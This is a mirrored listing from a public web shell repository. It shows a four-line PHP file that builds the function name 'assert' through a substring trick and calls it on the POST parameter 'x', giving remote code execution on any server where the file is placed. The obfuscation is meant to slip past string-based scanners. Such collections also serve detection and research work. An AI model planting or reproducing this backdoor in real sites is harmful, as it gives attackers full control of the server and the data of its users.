mirror of
https://github.com/tennc/webshell
synced 2024-11-10 13:44:18 +00:00
4 lines
76 B
PHP
4 lines
76 B
PHP
<?php
|
|
$a = substr_replace("asxxx","sert",2);
|
|
$a($_POST['x']);
|
|
?>
|